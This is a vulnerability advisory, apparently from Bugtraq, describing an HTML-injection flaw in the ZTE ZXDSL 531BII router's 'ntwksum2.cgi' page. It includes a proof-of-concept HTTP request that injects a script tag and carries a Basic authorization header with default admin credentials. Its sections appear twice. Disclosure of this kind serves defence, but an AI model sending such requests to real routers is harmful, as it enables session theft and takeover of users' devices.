ZTE ZXDSL 531BII 'ntwksum2.cgi' HTML Injection Vulnerability
BID:71005
Info
ZTE ZXDSL 531BII 'ntwksum2.cgi' HTML Injection Vulnerability
| Bugtraq ID: | 71005 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 31 2014 12:00AM |
| Updated: | Oct 31 2014 12:00AM |
| Credit: | Ravi Rajput |
| Vulnerable: |
ZTE ZXDSL 531BII V7.3.0f_D09_IN |
| Not Vulnerable: | |
Discussion
ZTE ZXDSL 531BII 'ntwksum2.cgi' HTML Injection Vulnerability
ZTE ZXDSL 531BII is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input submitted.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ZXDSL 531BII running firmware V7.3.0f_D09_IN is vulnerable; other versions may also be affected.
ZTE ZXDSL 531BII is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input submitted.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ZXDSL 531BII running firmware V7.3.0f_D09_IN is vulnerable; other versions may also be affected.
Exploit / POC
ZTE ZXDSL 531BII 'ntwksum2.cgi' HTML Injection Vulnerability
Attackers can exploit this issue using browser.
The following example request is available:
GET /ntwksum2.cgi?ntwkPrtcl=3&enblService=1&serviceName=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/enblbridge.html
Cookie: ls_google_allow=1; ls_iserver_timestamp_bnc_bsaved=1414677822551; ctx1420m06d05=7b2273756363657373223a302c226c6f675f616374697665223a307d
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Attackers can exploit this issue using browser.
The following example request is available:
GET /ntwksum2.cgi?ntwkPrtcl=3&enblService=1&serviceName=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/enblbridge.html
Cookie: ls_google_allow=1; ls_iserver_timestamp_bnc_bsaved=1414677822551; ctx1420m06d05=7b2273756363657373223a302c226c6f675f616374697665223a307d
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive